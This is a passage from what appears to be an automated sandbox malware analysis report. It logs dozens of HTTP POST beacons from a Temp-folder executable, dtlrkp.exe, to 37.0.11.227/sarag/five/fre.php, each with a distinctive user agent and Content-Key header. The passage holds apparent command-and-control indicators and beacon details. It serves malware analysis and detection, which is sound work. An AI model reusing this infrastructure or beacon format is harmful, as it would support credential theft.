                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 4E024674
                Content-Length: 169
                Connection: close
                May 5, 2022 09:03:36.774475098 CEST1222INHTTP/1.0 404 Not Found
                Date: Thu, 05 May 2022 07:03:36 GMT
                Server: Apache
                Status: 404 Not Found
                Content-Length: 23
                Connection: close
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                14192.168.2.64978637.0.11.22780C:\Users\user\AppData\Local\Temp\dtlrkp.exe
                TimestampkBytes transferredDirectionData
                May 5, 2022 09:03:38.682236910 CEST1223OUTPOST /sarag/five/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 37.0.11.227
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 4E024674
                Content-Length: 169
                Connection: close
                May 5, 2022 09:03:38.754662037 CEST1223INHTTP/1.0 404 Not Found
                Date: Thu, 05 May 2022 07:03:38 GMT
                Server: Apache
                Status: 404 Not Found
                Content-Length: 23
                Connection: close
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                15192.168.2.64978937.0.11.22780C:\Users\user\AppData\Local\Temp\dtlrkp.exe
                TimestampkBytes transferredDirectionData
                May 5, 2022 09:03:41.636991024 CEST1241OUTPOST /sarag/five/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 37.0.11.227
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 4E024674
                Content-Length: 169
                Connection: close
                May 5, 2022 09:03:41.723969936 CEST1241INHTTP/1.0 404 Not Found
                Date: Thu, 05 May 2022 07:03:41 GMT
                Server: Apache
                Status: 404 Not Found
                Content-Length: 23
                Connection: close
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                16192.168.2.64979437.0.11.22780C:\Users\user\AppData\Local\Temp\dtlrkp.exe
                TimestampkBytes transferredDirectionData
                May 5, 2022 09:03:44.385994911 CEST1293OUTPOST /sarag/five/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 37.0.11.227
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 4E024674
                Content-Length: 169
                Connection: close
                May 5, 2022 09:03:44.460093021 CEST1294INHTTP/1.0 404 Not Found
                Date: Thu, 05 May 2022 07:03:44 GMT
                Server: Apache
                Status: 404 Not Found
                Content-Length: 23
                Connection: close
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                17192.168.2.64979537.0.11.22780C:\Users\user\AppData\Local\Temp\dtlrkp.exe
                TimestampkBytes transferredDirectionData
                May 5, 2022 09:03:49.975068092 CEST1295OUTPOST /sarag/five/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 37.0.11.227
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 4E024674
                Content-Length: 169
                Connection: close
                May 5, 2022 09:03:50.056618929 CEST1295INHTTP/1.0 404 Not Found
                Date: Thu, 05 May 2022 07:03:49 GMT
                Server: Apache
                Status: 404 Not Found
                Content-Length: 23
                Connection: close
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                18192.168.2.64980037.0.11.22780C:\Users\user\AppData\Local\Temp\dtlrkp.exe
                TimestampkBytes transferredDirectionData
                May 5, 2022 09:03:53.694088936 CEST1303OUTPOST /sarag/five/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 37.0.11.227
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 4E024674
                Content-Length: 169
                Connection: close
                May 5, 2022 09:03:53.769658089 CEST1306INHTTP/1.0 404 Not Found
                Date: Thu, 05 May 2022 07:03:53 GMT
                Server: Apache
                Status: 404 Not Found
                Content-Length: 23
                Connection: close
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                19192.168.2.64980537.0.11.22780C:\Users\user\AppData\Local\Temp\dtlrkp.exe
                TimestampkBytes transferredDirectionData
                May 5, 2022 09:03:59.720062017 CEST6962OUTPOST /sarag/five/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 37.0.11.227
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 4E024674
                Content-Length: 169
                Connection: close
                May 5, 2022 09:03:59.790812016 CEST6968INHTTP/1.0 404 Not Found
                Date: Thu, 05 May 2022 07:03:59 GMT
                Server: Apache
                Status: 404 Not Found
                Content-Length: 23
                Connection: close
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                2192.168.2.64976937.0.11.22780C:\Users\user\AppData\Local\Temp\dtlrkp.exe
                TimestampkBytes transferredDirectionData
                May 5, 2022 09:03:12.865475893 CEST1128OUTPOST /sarag/five/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 37.0.11.227
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 4E024674
                Content-Length: 169
                Connection: close
                May 5, 2022 09:03:12.937504053 CEST1129INHTTP/1.0 404 Not Found
                Date: Thu, 05 May 2022 07:03:12 GMT
                Server: Apache
                Status: 404 Not Found
                Content-Length: 23
                Connection: close
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                20192.168.2.64980637.0.11.22780C:\Users\user\AppData\Local\Temp\dtlrkp.exe
                TimestampkBytes transferredDirectionData
                May 5, 2022 09:04:02.283799887 CEST6969OUTPOST /sarag/five/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 37.0.11.227
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 4E024674
                Content-Length: 169
                Connection: close
                May 5, 2022 09:04:02.366760015 CEST6970INHTTP/1.0 404 Not Found
                Date: Thu, 05 May 2022 07:04:02 GMT
                Server: Apache
                Status: 404 Not Found
                Content-Length: 23
                Connection: close
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                21192.168.2.64980737.0.11.22780C:\Users\user\AppData\Local\Temp\dtlrkp.exe
                TimestampkBytes transferredDirectionData
                May 5, 2022 09:04:04.665456057 CEST6971OUTPOST /sarag/five/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 37.0.11.227
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 4E024674
                Content-Length: 169
                Connection: close
                May 5, 2022 09:04:04.748842955 CEST6971INHTTP/1.0 404 Not Found
                Date: Thu, 05 May 2022 07:04:04 GMT
                Server: Apache
                Status: 404 Not Found
                Content-Length: 23
                Connection: close
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                22192.168.2.64980937.0.11.22780C:\Users\user\AppData\Local\Temp\dtlrkp.exe
                TimestampkBytes transferredDirectionData
                May 5, 2022 09:04:08.330585957 CEST7433OUTPOST /sarag/five/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 37.0.11.227
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 4E024674
                Content-Length: 169
                Connection: close
                May 5, 2022 09:04:08.408375978 CEST7433INHTTP/1.0 404 Not Found
                Date: Thu, 05 May 2022 07:04:08 GMT
                Server: Apache
                Status: 404 Not Found
                Content-Length: 23
                Connection: close
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                23192.168.2.64981037.0.11.22780C:\Users\user\AppData\Local\Temp\dtlrkp.exe
                TimestampkBytes transferredDirectionData
                May 5, 2022 09:04:10.170640945 CEST7434OUTPOST /sarag/five/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 37.0.11.227
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 4E024674
                Content-Length: 169
                Connection: close
                May 5, 2022 09:04:10.259654045 CEST7435INHTTP/1.0 404 Not Found
                Date: Thu, 05 May 2022 07:04:10 GMT
                Server: Apache
                Status: 404 Not Found
                Content-Length: 23
                Connection: close
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                24192.168.2.64981237.0.11.22780C:\Users\user\AppData\Local\Temp\dtlrkp.exe
                TimestampkBytes transferredDirectionData
                May 5, 2022 09:04:11.254199028 CEST7442OUTPOST /sarag/five/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 37.0.11.227
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 4E024674
                Content-Length: 169
                Connection: close
                May 5, 2022 09:04:11.362368107 CEST7442INHTTP/1.0 404 Not Found
                Date: Thu, 05 May 2022 07:04:11 GMT
                Server: Apache
                Status: 404 Not Found
                Content-Length: 23
                Connection: close
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                25192.168.2.64981337.0.11.22780C:\Users\user\AppData\Local\Temp\dtlrkp.exe
                TimestampkBytes transferredDirectionData
                May 5, 2022 09:04:12.471515894 CEST7443OUTPOST /sarag/five/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 37.0.11.227
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 4E024674
                Content-Length: 169
                Connection: close
                May 5, 2022 09:04:12.550162077 CEST7444INHTTP/1.0 404 Not Found
                Date: Thu, 05 May 2022 07:04:12 GMT
                Server: Apache
                Status: 404 Not Found
                Content-Length: 23
                Connection: close
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                26192.168.2.64981437.0.11.22780C:\Users\user\AppData\Local\Temp\dtlrkp.exe
                TimestampkBytes transferredDirectionData
                May 5, 2022 09:04:13.541987896 CEST7444OUTPOST /sarag/five/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 37.0.11.227
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 4E024674
                Content-Length: 169
                Connection: close
                May 5, 2022 09:04:13.632225037 CEST7445INHTTP/1.0 404 Not Found
                Date: Thu, 05 May 2022 07:04:13 GMT
                Server: Apache
                Status: 404 Not Found
                Content-Length: 23
                Connection: close
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                27192.168.2.64981537.0.11.22780C:\Users\user\AppData\Local\Temp\dtlrkp.exe
                TimestampkBytes transferredDirectionData
                May 5, 2022 09:04:15.192814112 CEST7446OUTPOST /sarag/five/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 37.0.11.227
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 4E024674
                Content-Length: 169
                Connection: close
                May 5, 2022 09:04:15.285619974 CEST7446INHTTP/1.0 404 Not Found
                Date: Thu, 05 May 2022 07:04:15 GMT
                Server: Apache
                Status: 404 Not Found
                Content-Length: 23
                Connection: close
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                28192.168.2.64981737.0.11.22780C:\Users\user\AppData\Local\Temp\dtlrkp.exe
                TimestampkBytes transferredDirectionData
                May 5, 2022 09:04:16.658932924 CEST7454OUTPOST /sarag/five/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 37.0.11.227
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 4E024674
                Content-Length: 169
                Connection: close
                May 5, 2022 09:04:16.734863043 CEST7454INHTTP/1.0 404 Not Found
                Date: Thu, 05 May 2022 07:04:16 GMT
                Server: Apache
                Status: 404 Not Found
                Content-Length: 23
                Connection: close
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                29192.168.2.64981837.0.11.22780C:\Users\user\AppData\Local\Temp\dtlrkp.exe
                TimestampkBytes transferredDirectionData
                May 5, 2022 09:04:19.192332029 CEST7455OUTPOST /sarag/five/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 37.0.11.227
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 4E024674
                Content-Length: 169
                Connection: close
                May 5, 2022 09:04:19.274632931 CEST7455INHTTP/1.0 404 Not Found
                Date: Thu, 05 May 2022 07:04:19 GMT
                Server: Apache
                Status: 404 Not Found
                Content-Length: 23
                Connection: close
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                3192.168.2.64977037.0.11.22780C:\Users\user\AppData\Local\Temp\dtlrkp.exe
                TimestampkBytes transferredDirectionData
                May 5, 2022 09:03:14.097517014 CEST1129OUTPOST /sarag/five/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 37.0.11.227
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 4E024674
                Content-Length: 169
                Connection: close
                May 5, 2022 09:03:14.179364920 CEST1130INHTTP/1.0 404 Not Found
                Date: Thu, 05 May 2022 07:03:14 GMT
                Server: Apache
                Status: 404 Not Found
                Content-Length: 23
                Connection: close
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                30192.168.2.64982037.0.11.22780C:\Users\user\AppData\Local\Temp\dtlrkp.exe
                TimestampkBytes transferredDirectionData
                May 5, 2022 09:04:23.251156092 CEST7461OUTPOST /sarag/five/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 37.0.11.227
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 4E024674
                Content-Length: 169
                Connection: close
                May 5, 2022 09:04:23.331387043 CEST7462INHTTP/1.0 404 Not Found
                Date: Thu, 05 May 2022 07:04:23 GMT
                Server: Apache
                Status: 404 Not Found
                Content-Length: 23
                Connection: close
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                31192.168.2.64982237.0.11.22780C:\Users\user\AppData\Local\Temp\dtlrkp.exe
                TimestampkBytes transferredDirectionData
                May 5, 2022 09:04:26.555557966 CEST7469OUTPOST /sarag/five/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 37.0.11.227
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 4E024674
                Content-Length: 169
                Connection: close
                May 5, 2022 09:04:26.632343054 CEST7469INHTTP/1.0 404 Not Found
                Date: Thu, 05 May 2022 07:04:26 GMT
                Server: Apache
                Status: 404 Not Found
                Content-Length: 23
                Connection: close
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                32192.168.2.64982337.0.11.22780C:\Users\user\AppData\Local\Temp\dtlrkp.exe
                TimestampkBytes transferredDirectionData
                May 5, 2022 09:04:28.261969090 CEST7470OUTPOST /sarag/five/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 37.0.11.227
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 4E024674
                Content-Length: 169
                Connection: close
                May 5, 2022 09:04:28.342608929 CEST7471INHTTP/1.0 404 Not Found
                Date: Thu, 05 May 2022 07:04:28 GMT
                Server: Apache
                Status: 404 Not Found
                Content-Length: 23
                Connection: close
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                33192.168.2.64982437.0.11.22780C:\Users\user\AppData\Local\Temp\dtlrkp.exe
                TimestampkBytes transferredDirectionData
                May 5, 2022 09:04:31.451011896 CEST7471OUTPOST /sarag/five/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 37.0.11.227
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 4E024674
                Content-Length: 169
                Connection: close
                May 5, 2022 09:04:31.539371967 CEST7472INHTTP/1.0 404 Not Found
                Date: Thu, 05 May 2022 07:04:31 GMT
                Server: Apache
                Status: 404 Not Found
                Content-Length: 23
                Connection: close
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                34192.168.2.64982637.0.11.22780C:\Users\user\AppData\Local\Temp\dtlrkp.exe
                TimestampkBytes transferredDirectionData
                May 5, 2022 09:04:34.327413082 CEST7515OUTPOST /sarag/five/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 37.0.11.227
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 4E024674
                Content-Length: 169
                Connection: close
                May 5, 2022 09:04:34.426101923 CEST7515INHTTP/1.0 404 Not Found
                Date: Thu, 05 May 2022 07:04:34 GMT
                Server: Apache
                Status: 404 Not Found
                Content-Length: 23
                Connection: close
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                35192.168.2.64982937.0.11.22780C:\Users\user\AppData\Local\Temp\dtlrkp.exe
                TimestampkBytes transferredDirectionData
                May 5, 2022 09:04:35.796885014 CEST7562OUTPOST /sarag/five/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 37.0.11.227
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 4E024674
                Content-Length: 169
                Connection: close
                May 5, 2022 09:04:35.877049923 CEST7563INHTTP/1.0 404 Not Found
                Date: Thu, 05 May 2022 07:04:35 GMT
                Server: Apache
                Status: 404 Not Found
                Content-Length: 23
                Connection: close
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                36192.168.2.64983637.0.11.22780C:\Users\user\AppData\Local\Temp\dtlrkp.exe
                TimestampkBytes transferredDirectionData
                May 5, 2022 09:04:37.419766903 CEST7659OUTPOST /sarag/five/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 37.0.11.227
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 4E024674
                Content-Length: 169
                Connection: close
                May 5, 2022 09:04:37.500710964 CEST7659INHTTP/1.0 404 Not Found
                Date: Thu, 05 May 2022 07:04:37 GMT
                Server: Apache
                Status: 404 Not Found
                Content-Length: 23
                Connection: close
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                37192.168.2.64984337.0.11.22780C:\Users\user\AppData\Local\Temp\dtlrkp.exe
                TimestampkBytes transferredDirectionData
                May 5, 2022 09:04:38.680257082 CEST7747OUTPOST /sarag/five/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 37.0.11.227
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 4E024674
                Content-Length: 169
                Connection: close
                May 5, 2022 09:04:38.761471033 CEST7750INHTTP/1.0 404 Not Found
                Date: Thu, 05 May 2022 07:04:38 GMT
                Server: Apache
                Status: 404 Not Found
                Content-Length: 23
                Connection: close
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                38192.168.2.64985237.0.11.22780C:\Users\user\AppData\Local\Temp\dtlrkp.exe
                TimestampkBytes transferredDirectionData
                May 5, 2022 09:04:39.884990931 CEST7897OUTPOST /sarag/five/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 37.0.11.227
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 4E024674
                Content-Length: 169
                Connection: close
                May 5, 2022 09:04:39.957449913 CEST7897INHTTP/1.0 404 Not Found
                Date: Thu, 05 May 2022 07:04:39 GMT
                Server: Apache
                Status: 404 Not Found
                Content-Length: 23
                Connection: close
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                39192.168.2.64986037.0.11.22780C:\Users\user\AppData\Local\Temp\dtlrkp.exe
                TimestampkBytes transferredDirectionData
                May 5, 2022 09:04:41.860008001 CEST7998OUTPOST /sarag/five/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 37.0.11.227
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 4E024674
                Content-Length: 169
                Connection: close
                May 5, 2022 09:04:41.937803984 CEST8036INHTTP/1.0 404 Not Found
                Date: Thu, 05 May 2022 07:04:41 GMT
                Server: Apache
                Status: 404 Not Found
                Content-Length: 23
                Connection: close
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                4192.168.2.64977137.0.11.22780C:\Users\user\AppData\Local\Temp\dtlrkp.exe
                TimestampkBytes transferredDirectionData
                May 5, 2022 09:03:15.560941935 CEST1131OUTPOST /sarag/five/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 37.0.11.227
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 4E024674
                Content-Length: 169
                Connection: close
                May 5, 2022 09:03:15.634563923 CEST1131INHTTP/1.0 404 Not Found
                Date: Thu, 05 May 2022 07:03:15 GMT
                Server: Apache
                Status: 404 Not Found
                Content-Length: 23
                Connection: close
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                40192.168.2.64987037.0.11.22780C:\Users\user\AppData\Local\Temp\dtlrkp.exe
                TimestampkBytes transferredDirectionData
                May 5, 2022 09:04:45.993103981 CEST8308OUTPOST /sarag/five/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 37.0.11.227
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 4E024674
                Content-Length: 169
                Connection: close
                May 5, 2022 09:04:46.075139046 CEST8314INHTTP/1.0 404 Not Found
                Date: Thu, 05 May 2022 07:04:46 GMT
                Server: Apache
                Status: 404 Not Found
                Content-Length: 23
                Connection: close
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                41192.168.2.64987837.0.11.22780C:\Users\user\AppData\Local\Temp\dtlrkp.exe
                TimestampkBytes transferredDirectionData
                May 5, 2022 09:04:49.277683973 CEST8571OUTPOST /sarag/five/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 37.0.11.227
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 4E024674
                Content-Length: 169
                Connection: close
                May 5, 2022 09:04:49.395442963 CEST8572INHTTP/1.0 404 Not Found
                Date: Thu, 05 May 2022 07:04:49 GMT
                Server: Apache
                Status: 404 Not Found
                Content-Length: 23
                Connection: close
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                42192.168.2.64988437.0.11.22780C:\Users\user\AppData\Local\Temp\dtlrkp.exe
                TimestampkBytes transferredDirectionData
                May 5, 2022 09:04:52.431554079 CEST8832OUTPOST /sarag/five/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 37.0.11.227
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 4E024674
                Content-Length: 169
                Connection: close
                May 5, 2022 09:04:52.517389059 CEST8833INHTTP/1.0 404 Not Found
                Date: Thu, 05 May 2022 07:04:52 GMT
                Server: Apache
                Status: 404 Not Found
                Content-Length: 23
                Connection: close
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                43192.168.2.64988837.0.11.22780C:\Users\user\AppData\Local\Temp\dtlrkp.exe
                TimestampkBytes transferredDirectionData
                May 5, 2022 09:04:55.790210009 CEST8956OUTPOST /sarag/five/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 37.0.11.227
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 4E024674
                Content-Length: 169
                Connection: close
                May 5, 2022 09:04:55.868891954 CEST8957INHTTP/1.0 404 Not Found
                Date: Thu, 05 May 2022 07:04:55 GMT
                Server: Apache
                Status: 404 Not Found
                Content-Length: 23
                Connection: close
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
